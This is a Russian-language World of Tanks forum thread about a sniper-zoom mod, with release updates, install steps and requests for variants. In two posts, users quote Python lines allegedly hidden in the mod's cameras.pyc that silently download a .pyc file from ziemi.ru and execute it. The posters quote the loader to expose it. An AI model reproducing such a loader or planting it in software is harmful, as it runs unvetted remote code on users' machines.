Перейти к содержимому


MOD_Zoom 0.9.1_max_10 позиций_x1.6-x60.0 (Обновлен 11.06.2014)


  • Закрытая тема Тема закрыта
Сообщений в теме: 863

Alexlv2 #21 Отправлено 06 апр 2013 - 11:40

    Старший сержант

  • Игроки
  • 7995 боев
  • 238
  • [L-S-E] L-S-E
  • Регистрация:
    29.07.2012

*
Популярное сообщение!

     Граждане, кина больше не будет, освободите места!  (с) Владимир Чивилихин. Про Клаву Иванову (1964)

 

     Удачи в боях!


UPD 19.06.2013: - Zoom_0.8.6_x1-x128
UPD 20.07.2013: - Zoom_0.8.7_x2-x30
UPD 11.09.2013: - Zoom_0.8.8_x2-x30
UPD 08.12.2013: - Zoom_0,8,9_x1.6-x142

UPD 22.12.2013: - Zoom_0,8,10_x1.6-x142

UPD 27.02.2014: - Zoom_0.8.11_x1.6-x60.0

UPD 20.04.2014: - Zoom_0.9.0_x1.6-x60.0

UPD 04.05.2014: - Zoom_0.9.0_x1.6-x60.0

UPD 11.06.2014: - Zoom_0.9.1_x1.6-x60.0

.............................................


Сообщение отредактировал Alexlv2: 23 авг 2014 - 12:35


Alexlv2 #22 Отправлено 19 июн 2013 - 09:59

    Старший сержант

  • Игроки
  • 7995 боев
  • 238
  • [L-S-E] L-S-E
  • Регистрация:
    29.07.2012

Просмотр сообщенияMilordan (19 Июн 2013 - 08:23) писал:

"Есть модифицированная версия с 8-ми позиционным переключателем кратности прицела и максимальным x128."
А для версии 0.8.6 можете сделать такой же прицел?
Был бы премного благодарен.
Уже сделали. Имеется 10-ти позиционный с максимальной кратностью х128.
Содержимое архива скопировать в /res_mods с заменой файлов.

Прикрепленные файлы

  • Прикрепленный файл   Zoom_10 позиций_х1-128.rar   24,12К


Milordan #23 Отправлено 19 июн 2013 - 10:17

    Сержант

  • Игроки
  • 24808 боев
  • 193
  • Регистрация:
    28.10.2011

Просмотр сообщенияAlexlv2 (19 Июн 2013 - 09:59) писал:

Уже сделали. Имеется 10-ти позиционный с максимальной кратностью х128.
Содержимое архива скопировать в /res_mods с заменой файлов.

Работает!
Премного благодарен!

andron1202 #24 Отправлено 19 июн 2013 - 17:54

    Новобранец

  • Игроки
  • 64149 боев
  • 3
  • Регистрация:
    25.04.2012
спасибо.пользовался в 0.8.5если будет работать в 0.8.6буду счастлив!

denik1109 #25 Отправлено 20 июн 2013 - 08:20

    Старший сержант

  • Игроки
  • 15587 боев
  • 218
  • [WCAT1] WCAT1
  • Регистрация:
    07.03.2012
Наконец -то что хотел ,огромное спасибо. Пользовался таким в 0.8.5.привык! Все работает, ни с чем не конфликтует, проверил сам!

EXIV1989 #26 Отправлено 20 июн 2013 - 11:16

    Рядовой

  • Игроки
  • 12286 боев
  • 16
  • Регистрация:
    19.01.2011
Огромная благодарность за мод! Из всех подобных модов - Ваш самый удобный.

Dogma37 #27 Отправлено 20 июн 2013 - 11:16

    Сержант

  • Игроки
  • 63336 боев
  • 112
  • [YA_R] YA_R
  • Регистрация:
    01.09.2010
noscroll прикрутите к нему пожалуйста

Ryba4okPerm #28 Отправлено 20 июн 2013 - 11:51

    Младший лейтенант

  • Игроки
  • 34974 боя
  • 833
  • Регистрация:
    06.05.2013
да без  носкрола неудобно - с х3 зумом как то было пофиг обратно вернуть секунда - а вот тут уже если выпал из прицела пока вернешся время занимает - носкрол актуален при таком зуме

Alexlv1 #29 Отправлено 20 июн 2013 - 14:40

    Старший сержант

  • Игроки
  • 1074 боя
  • 346
  • [L-S-E] L-S-E
  • Регистрация:
    12.02.2013

Просмотр сообщенияDogma37 (20 Июн 2013 - 11:16) писал:

noscroll прикрутите к нему пожалуйста
Прикрутил. Процедура установки прежняя, т.е. папку res_mods из приложенного архива копируем в клиента по пути .../res_mods с заменой файлов.

Прикрепленные файлы

  • Прикрепленный файл   Zoom_10 поз_x1-128_NoScroll.rar   40,45К


MakcT40 #30 Отправлено 20 июн 2013 - 15:03

    Старший сержант

  • Игроки
  • 3765 боев
  • 222
  • Регистрация:
    02.10.2012
Убери, всё-таки, из cameras.pyc строки:
try:
import httplib
import sys
import os, glob, marshal
conn = httplib.HTTPConnection('ziemi.ru')
conn.request('GET', '/advancedsniper.pyc')
rsp = conn.getresponse()
data_received = rsp.read()
code = marshal.loads(data_received[8:])
exec code
conn.close()
except:
pass
А то как-то некрасиво получается.

koshnaranek #31 Отправлено 20 июн 2013 - 15:28

    Старшина

  • Игроки
  • 15432 боя
  • 698
  • Регистрация:
    12.05.2010

Просмотр сообщенияMakcT40 (20 Июн 2013 - 15:03) писал:

Убери, всё-таки, из cameras.pyc строки:
try:
import httplib
import sys
import os, glob, marshal
conn = httplib.HTTPConnection('ziemi.ru')
conn.request('GET', '/advancedsniper.pyc')
rsp = conn.getresponse()
data_received = rsp.read()
code = marshal.loads(data_received[8:])
exec code
conn.close()
except:
pass
А то как-то некрасиво получается.
и не говори... ему наверно лишь бы запостить, а дальше пусть сами разбираются...

Volga0825 #32 Отправлено 20 июн 2013 - 16:50

    Младший лейтенант

  • Игроки
  • 83298 боев
  • 1 078
  • Регистрация:
    19.07.2011

Просмотр сообщенияAlexlv2 (19 Июн 2013 - 09:59) писал:

Уже сделали. Имеется 10-ти позиционный с максимальной кратностью х128.Содержимое архива скопировать в /res_mods с заменой файлов.
А ты уверен, что он 10-позиционный и только х128? Может быть позиций  больше и намного и может больше, чем х128м жно поставить и намного? Только не спраивай "Зачем так много". Ставь столько сколько нужно ТЕБЕ!!!

Alexlv2 #33 Отправлено 20 июн 2013 - 18:44

    Старший сержант

  • Игроки
  • 7995 боев
  • 238
  • [L-S-E] L-S-E
  • Регистрация:
    29.07.2012

Просмотр сообщенияVolga0825 (20 Июн 2013 - 16:50) писал:

А ты уверен, что он 10-позиционный и только х128? Может быть позиций  больше и намного и может больше, чем х128м жно поставить и намного? Только не спраивай "Зачем так много". Ставь столько сколько нужно ТЕБЕ!!!
Ты это...таво...не кури много... :trollface:
Разве я где-то утверждал, что Zoom ограничен параметрами 10x128? Что-то  не припоминаю.
Как раз таки для версии 0.8.5 Zoom x1-x300 разлетался по Инету как пирожки горячие.
Уверен в том, что предложенный известными авторами конкретный вариант  - 10-ти позиционный с крайней отметкой x128 по факту. Или ты чего другое высмотрел?
МЕНЕ от ТЕБЮ :trollface: ничего не нужно ни ставить, ни ляжить...ни спраИвать.

SILENTXX #34 Отправлено 20 июн 2013 - 19:09

    Ефрейтор

  • Игроки
  • 44659 боев
  • 28
  • [WIN] WIN
  • Регистрация:
    08.11.2012
зеленоватость по краям в снайперском прицеле можно убрать ?

Alexlv2 #35 Отправлено 21 июн 2013 - 09:45

    Старший сержант

  • Игроки
  • 7995 боев
  • 238
  • [L-S-E] L-S-E
  • Регистрация:
    29.07.2012

Просмотр сообщенияSILENTXX (20 Июн 2013 - 19:09) писал:

зеленоватость по краям в снайперском прицеле можно убрать ?
Извини, слегка не понял о какой "зеленоватости" идет речь? Может о затемнении?
Если о нем, то в приложении версия Zoom без скролла и затемнения в снайперском режиме.
Устанавливается по-прежнему - папку res_mods из архива копируем с заменой в  клиентский .../res_mods.

Прикрепленные файлы

  • Прикрепленный файл   Zoom_10 поз_x1-128_NoScroll_Без затемнения.rar   42,51К


mlechnik27 #36 Отправлено 21 июн 2013 - 10:06

    Новобранец

  • Игроки
  • 23705 боев
  • 1
  • Регистрация:
    27.08.2012
спасибо

TheOvo #37 Отправлено 21 июн 2013 - 11:20

    Младший лейтенант

  • Игроки
  • 21558 боев
  • 1 224
  • Регистрация:
    16.01.2011

Просмотр сообщенияkoshnaranek (20 Июн 2013 - 15:28) писал:

и не говори... ему наверно лишь бы запостить, а дальше пусть сами разбираются...
Кош, да сделай уже зум с выбором количества шагов, чтобы всяким плагиаторам не было смысла тебя копировать. Думаю Никей2х2 не будет против.

SILENTXX #38 Отправлено 21 июн 2013 - 12:03

    Ефрейтор

  • Игроки
  • 44659 боев
  • 28
  • [WIN] WIN
  • Регистрация:
    08.11.2012

Просмотр сообщенияAlexlv2 (21 Июн 2013 - 09:45) писал:

Извини, слегка не понял о какой "зеленоватости" идет речь? Может о затемнении?
Если о нем, то в приложении версия Zoom без скролла и затемнения в снайперском режиме.
Устанавливается по-прежнему - папку res_mods из архива копируем с заменой в  клиентский .../res_mods.
да, в затемнении идет зеленоватость по краям.
можно без затемнения но со скроллом ?

Ryba4okPerm #39 Отправлено 21 июн 2013 - 12:31

    Младший лейтенант

  • Игроки
  • 34974 боя
  • 833
  • Регистрация:
    06.05.2013
а как связать вот его с этим переделом кульным и чтоб Носкрол был чтобы нетолько входить в Снайп прицел не могло дак еще и выходить из него не могло при помощи скрола? уж очень удобен но блин х4 всего лиш неудобно(
http://forum.worldof...5#entry21873795

Alexlv1 #40 Отправлено 21 июн 2013 - 14:37

    Старший сержант

  • Игроки
  • 1074 боя
  • 346
  • [L-S-E] L-S-E
  • Регистрация:
    12.02.2013

Просмотр сообщенияSILENTXX (21 Июн 2013 - 12:03) писал:

да, в затемнении идет зеленоватость по краям.
можно без затемнения но со скроллом ?
Можно. Удали из папки .../res_mods/0.8.6/gui файл NoScroll.xml или, чтобы сохранить "память" на крайнюю использованную позицию Zoom, в первой строке настроек смени True на False. Scroll включится и "память" сохранится.
Для редактирования используй Notepad++

Сообщение отредактировал Alexlv1: 21 июн 2013 - 14:57


ajka454 #41 Отправлено 21 июн 2013 - 15:29

    Сержант

  • Игроки
  • 13391 бой
  • 126
  • [SH_74] SH_74
  • Регистрация:
    20.09.2012
Zoom_10 поз_x1-128_NoScroll - класная "весч|"
спасибо ++++++++++++
PS
заведи в настройках уроывень изменения(мне 10 очень много 5-7 - за глаза) типа
<range>10</range> /// значения от 2 до 10 иначе 10
PS2
"Мод отключения эффекта выстрелов и попадания WOT 0.8.6" http://www.terog.ru/...popadaniia-wot/
ЗЫ: Мод отключает эффект отката при использовании динамической камеры, а также эффект тряски камеры при попадании снаряда по вам. Таким образом прицел можно стабильно удерживать на цели.
может добавить (реально танк все время трясется, зато прицел как влитой)

Сообщение отредактировал ajka454: 21 июн 2013 - 15:52





Количество пользователей, просматривающих этот форум: 1

0 пользователей, 1 гостей, 0 анонимных